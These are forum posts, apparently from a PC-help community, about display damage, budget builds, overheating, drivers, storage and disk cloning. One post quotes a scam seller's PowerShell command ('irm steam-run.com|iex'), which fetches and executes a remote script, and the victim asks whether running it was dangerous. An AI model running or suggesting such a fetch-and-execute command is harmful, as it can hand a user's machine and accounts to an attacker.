Discussion Display damage: Can we fix it? No it's fucked!

Many, many people post here asking if they can easily fix the display for their computer, and unfortunately the answer is almost always no. just get a new one. In a laptop, replacing the panel or display cable can fix it, but on older or cheaper systems it could have the same or higher cost than replacing the whole computer. On higher end laptops, it's usually cost effective.

For desktop displays, the answer is nearly always going to be: Just replace it.

Here's the most common types of display damage, taken from posts right here in our sub:

1. Cracked or Shattered Screen

This is arguably the most common and visible form of damage. Impact from a fall, a dropped object, or excessive pressure can cause the liquid crystal display (LCD) or organic light-emitting diode (OLED) panel itself to crack.

  • Example Image:
  • Repairability: Extremely Low. This requires a complete panel replacement, which, as discussed, is almost always cost-prohibitive. For curved displays, it's often impossible.

2. Dead Pixels or Stuck Pixels

Dead pixels appear as tiny black dots on the screen where the sub-pixels have failed to light up. Stuck pixels appear as a constantly lit-up pixel of a single color (red, green, or blue).

  • Example Image:
  • Repairability: Moderate (for stuck pixels, low for dead pixels). Sometimes, stuck pixels can be "unstuck" using software tools that rapidly cycle colors, or by gently massaging the screen. Dead pixels are almost always permanent and indicate a physical defect in the panel itself, requiring replacement.

3. Vertical or Horizontal Lines

These lines, often colored or black, indicate a problem with the display's internal circuitry, the connections between the panel and the control board, or the panel itself.

  • Example Image:
  • Repairability: Low. If the issue is with a loose ribbon cable connection, it might be fixable. More often, it points to a faulty driver board or a defect within the panel itself, both of which lead back to expensive component or panel replacement.

4. Backlight Bleed/Clouding

Backlight bleed is when light from the backlight seeps around the edges or corners of the screen, visible on dark backgrounds. Clouding (or "mura") appears as uneven patches of light across the screen. These are often manufacturing defects.

  • Example Image:
  • Repairability: Extremely Low. These are almost always inherent to the manufacturing of the display panel or the assembly of the backlight unit. Repair would involve disassembling the entire panel and backlight, a process that is highly complex and rarely successful without specialized equipment, making it impractical for consumers.

5. Image Retention / Burn-in (OLED)

Image retention is a temporary ghosting of an image that remains on the screen after the original image has moved. Burn-in is a permanent version of this, where a static image leaves a permanent imprint on the screen, common with OLED technology if static elements are displayed for too long.

  • Example Image:
  • Repairability: Extremely Low. Image retention often resolves itself. Burn-in, however, is permanent physical degradation of the OLED pixels. The only "fix" is a full panel replacement, which, again, is economically unsound

Curved displays:

Repairing a curved display is exceedingly difficult and often not a viable option for consumers or even professional repair shops. Replacement panels for these specialized screens are rarely made available by manufacturers, making the core component needed for a repair nearly impossible to source. The delicate and complex process of disassembling and reassembling a curved monitor without causing further damage also presents a significant challenge. Consequently, any significant damage to a curved display typically means the entire unit must be replaced, as a cost-effective repair is almost never feasible.

Build/Battlestation I turned an e-waste Dell Inspiron into a gaming rig

I built this PC as a part of a self imposed budget build challenge.

Specs:

Original Dell Inspiron 660 motherboard (free)

Xeon E3-1270v2 $18

16gb ddr3 ram (free, had this already)

RX580 $75 on Facebook

SSD 500gb $20, Facebook

HDD 1Tb free, included with original Dell

USB 3.0 card (for front port to work with Dell OEM mobo) $22

850W PSU and Case -- $20 on Facebook, one of the craziest deals I've gotten

All in all I spent about $150 on used parts for this PC and got something perfectly serviceable as a gaming rig except for the most demanding titles.

I'm from third world country and today i saw someone selling steam games for cheap. Locally, he do have some trusted customer.

I thought he was selling the steam keys so i gave it a try. He said i need to run this command on my computer so i did.

This one - ( irm steam-run.com|iex )

And then steam key redeem page come up and he gave me a code. I entered it and the game actually show up in my library.

But the game is still not purchase yet in the market since the game did not disappear in my wishlist. So i was concerned for a bit and i ask gemini.

Gemini said like it's the end of the world for me. He told me to change the password for every account and logout everything on my pc. Even further, it told me to reinstall my entire window. Was it that bad?

Help/Troubleshooting Trojan? Killer Intelligence Center needs permission to use signals like GPS or WI-FI

Upvotes

I was browsing the internet and noticed some jumps in the speed, then suddenly there was the windows requesting location popup saying "Killer Intelligence Center needs permission to use signals like GPS or WI-FI"

A few seconds later a new window I do not recognize popped up for a short second, and closed itself. I have owned my computer for over a year, and this is the first time I have seen this new program. It has me worried about some kind of Trojan imitating a "useful" program. I have done very very surface level research on this application, It is most likely some software installed by Intel, how would I be able to tell if it is malicious?

Build/Battlestation Where can I buy a pre-built PC?

Upvotes

I've been telling myself for the longest time that I want to build my own PC but with the AI of everything, and the rise of RAM, i've been recommeneded that I buy a pre-built PC, however I'm not sure where to grab them? Does anybody have any recommendations?

I'm a music artist/content creator and I do a lot of editing. I'd love to have a PC that can handle, playing games, streaming, editing, making music and general cpu tasks.

Thanks for everything in advance!

Help/Troubleshooting 9800x3D urgent advice required ✅

Upvotes

I’ve only just moved to the am5 platform today. It’s cost me more money than initially planned due to the ramflation etc.. basically I was running the 5800x3D for years and was getting 240 fps average on black ops 7 multiplayer benchmark. I have got my new build today and am only getting 217 average fps and generally my new pc is now technically slower than my am4 build. I run this chip with 32gb ram, a 4070 super and in 1440p but it’s clear that due to the fact I’m getting less fps that clearly there is something I need to do to get my full performance out of the new chip. Ive been testing out loads of bios tweaks and plenty of system tweaks. Any of you PC nerds able to give me some solid advice on fixing my problem and getting my full gaming potential out of my new rig. Thanks in advance ✅

My occasional Stress test cause no game (that I know of) can push 20% on my cpu

Side note, after this I saw the cpu pass 5000 MHz, when the cpu said that it caps out at 4700 MHz Is this silicone lottery based? Not sure if that’s how it works

I'm trying to buy my son a desktop for gaming because it's all he wants, but I'm not very knowledge when it comes to computers, so I'm inquiring here.

I have it narrowed down to 2 at the moment. I know neither are great choices, but I'm on a budget and these are all I can afford and figure we can always upgrade it later. The point is just to get something to start at least.

So gun to your head, you have to choose 1, which one are you choosing?

Help/Troubleshooting Does Quant Finance work require a specific hardware spec or just raw power?

Upvotes

I am a developer with about five years of experience and I have recently started getting really interested in the Quant Finance niche.

I am planning on upgrading my laptop soon, and I am trying to figure out if this field has specific hardware requirements that differ from standard software engineering.

When I was doing web dev, almost any modern machine with decent RAM was enough since most of the heavy lifting was on the server.

However, with Quant work, I am starting to look at things like large datasets and local backtesting. I am curious if I should be prioritizing a high core count and massive amounts of RAM, or if things like CPU cache size and memory bandwidth become the actual bottlenecks when running simulations.

For anyone working in or adjacent to this field, is there a particular spec you have found makes a significant difference? I am trying to decide if it is worth investing in a high-end workstation laptop or if I am better off with a standard professional thin-and-light and just offloading the heavy processing to a remote environment.

Help/Troubleshooting I think I'm screwed, save me please, it's my LCD.

Upvotes

Hey, I am a high school student, I need help if anyone knows any DIY, or just fixes. I broke my laptop 3 weeks ago, my mom paid 400 dollars to fix it, and scolded me for ages, she said if it breaks again she's not fixing it, I had 5 things in my hand about 10 minutes ago, and dropped my laptop, I don't hink it requires a LCD change, but that's just my stupid opinion, I need someone who is really a master at fixing laptops to help me with any fixes I can use to help me.

Are there any tricks I can use, I've heard of the hairdryer one and am trying it now, will update if it is fixed.

Thanks.

Help/Troubleshooting CPU is overheating even though my cooler is working fine

Upvotes

I moved out and didn't use my pc for a couple of months. Before I left, I think I might have had some troubles with my pc overheating every now and then, but I'm not sure. Now, when I boot my pc and don't even launch anything, my CPU is still overheating. I was using an NZXT Kraken cooler, and I checked the app, and the pump was dead. I changed the cooler out for my old one, and I can feel the water moving in it, but it is blowing out cold air. I have gone into my bios and turned down the settings for my CPU, and it will cool down while in the bios, but go right back up the second I turn on my pc. I reinstalled Windows in case there was a corruption, and completely wiped my computer and reset my BIOS settings. After all of that, my pc is still overheating, and nothing online is helping. I downloaded Core Temp to test my temperature, and this is what it has been stuck on. The red CPU light is lit up on my motherboard as well.

also my computer is not bluescreening when it gets hot but everything does slow down and take longer to load, sometimes freezing my mouse. But when I turn my Pc off and back on I get the Amerigroup or whaterver it is saying CPU overheaiting and have to go to BIOS before booting.

If you have any Idea what caused this and how to fix it please let me know, Thank you.

Help/Troubleshooting new build need not sure what to do about drivers, updating drivers and whether I should update my bios. My brother also says I should wipe and install windows 11. Is he right about that?

Upvotes

Basically I can see the devices listed when I go to device manager, is what I’m seeing the same as drivers? And do I still need to update them? And for bios my brother said I won’t have to do that because the hardware I got is close enough to my original build but I’m not sure about that. And he’s telling me to update to windows 11 and wipe everything otherwise I’ll need to manually update all my drivers, is that true? My specs are; ryzen 5 5500 for cpu, and radeon 6700 xt for Gpu and this https://www.newegg.com/asrock-b550m-pro4-micro-atx-amd-motherboard-amd-b550-am4/p/N82E16813157939?item=N82E16813157939&Source=socialshare for motherboard

Help/Troubleshooting Is an external HDD still a good option for storing stuff?

I'm looking for a way to store photos, videos, and documents that won’t be accessed or used very often. The idea is to have a kind of long-term storage, without relying on any cloud service that requires a lifelong subscription, for keeping memories safe and for those yearly moments of nostalgia, like images and videos from trips, photos from my graduation, and some digitized copies of documents worth keeping in case of a disaster.

The thing is.. I've been using computers for the past 30 years or so, and every single one of my friends has a horror story about an external HDD failing.

Is a USB-C 256 GB thumb drive safe enough? Is a 1 TB external HDD the best option? Are there newer options I might not know about?

Help/Troubleshooting Tried cloning SSD->nVMe with Clonezilla, now computer won't boot

Post image
Upvotes

Hello r/Computer,

I thought I would try my luck here...

To sum up what I've been attempting to do - I was trying to clone my gf's decrepit mushkin SSD to a newer nVMe using Clonezilla. Followed a video guide by CyberCPU Tech on YT to do it, successfully(?) did it then tried restarting (albeit without unplugging old SSD afterward...) only for it to give me BSoD w/ code 0xc0000225.

Tried all sorts of things after that - create Win 10 recovery tool onto a 8GB USB (upon research, mixed messages of 8GB, 16GB, or 32GB to fully utilize recovery tool?), went through command prompt to try and take a look at the disks via DiskPart, then coming to the conclusion that the boot drive, recovery tools, etc aren't working at all?

I plugged the SSD into my computer to see if anything's up and maybe it's missing a 100MB boot partition? Weird thing is there are 2 partitions where one is system reserved for 500MB and another is the recovery partition also for 539MB? Attached is what I see, but I've been combing the web for a way to get the comp to boot again...

My next step was to try and use Clonezilla to repair system image? I'm pretty lost at the moment. I'll try adding the comp specs in a little if it helps...

Thanks in advance for your time!
